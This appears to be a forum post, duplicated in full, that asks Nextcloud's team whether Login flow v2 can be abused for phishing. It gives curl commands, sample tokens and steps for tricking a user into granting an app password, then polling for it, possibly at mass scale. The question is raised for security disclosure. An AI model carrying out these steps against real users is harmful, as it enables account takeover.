Dear Team,
i discovered Login flow v2
My Question is at the bottom :-)
Lets say, a phisher tries to use that API to initiate the Retrieval of an AppToken for UserXYZ, that is not himself.
curl -X POST https://demo2.nextcloud.com/index.php/login/v2
(-> Using demo2.nextcloud.com in this example, but it could be nextcloud.ImportantCompany.com as well)
The phisher gets back the following:
{"poll":{"token":"3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH","endpoint":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/poll"},"login":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/flow\/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s"}
The phisher then sends an EMail to UserXYZ at ImportantCompany Ltd. to open up the link and follow the instructions at:
https://demo2.nextcloud.com/index.php/login/v2/flow/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s
The phisher waits for the user to grant access and afterwards the phisher polls:
curl -X POST https://demo2.nextcloud.com/login/v2/poll -d "token=3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH"
So the phisher retrieves an AppToken für UserXYZ like:
{
"server":"https:\/\/demo2.com.com",
"loginName":"UserXYZ",
"appPassword":"yKTVA4zgxjfivy52WqD8kW3M2pKGQr6srmUXMipRdunxjPFripJn0GMfmtNOqOolYSuJ6sCN"
}
I assume the phisher then can use all API Calls whatsoever of that Nextcloud's User named UserXYZ.
Question is: Are there any measures that prevent a phisher to use this method?
Perhaps not only targeted for a specific user, but using this for a mass mailing phishing attack.
(The phisher then of course has to build an infrastructure to mass-poll the API, which should be no problem)
Am i missing something here?
Dear Team,
i discovered Login flow v2
My Question is at the bottom :-)
Lets say, a phisher tries to use that API to initiate the Retrieval of an AppToken for UserXYZ, that is not himself.
curl -X POST https://demo2.nextcloud.com/index.php/login/v2(-> Using demo2.nextcloud.com in this example, but it could be nextcloud.ImportantCompany.com as well)
The phisher gets back the following:
{"poll":{"token":"3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH","endpoint":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/poll"},"login":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/flow\/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s"}The phisher then sends an EMail to UserXYZ at ImportantCompany Ltd. to open up the link and follow the instructions at:
https://demo2.nextcloud.com/index.php/login/v2/flow/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s
The phisher waits for the user to grant access and afterwards the phisher polls:
curl -X POST https://demo2.nextcloud.com/login/v2/poll -d "token=3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH"So the phisher retrieves an AppToken für UserXYZ like:
I assume the phisher then can use all API Calls whatsoever of that Nextcloud's User named UserXYZ.
Question is: Are there any measures that prevent a phisher to use this method?
Perhaps not only targeted for a specific user, but using this for a mass mailing phishing attack.
(The phisher then of course has to build an infrastructure to mass-poll the API, which should be no problem)
Am i missing something here?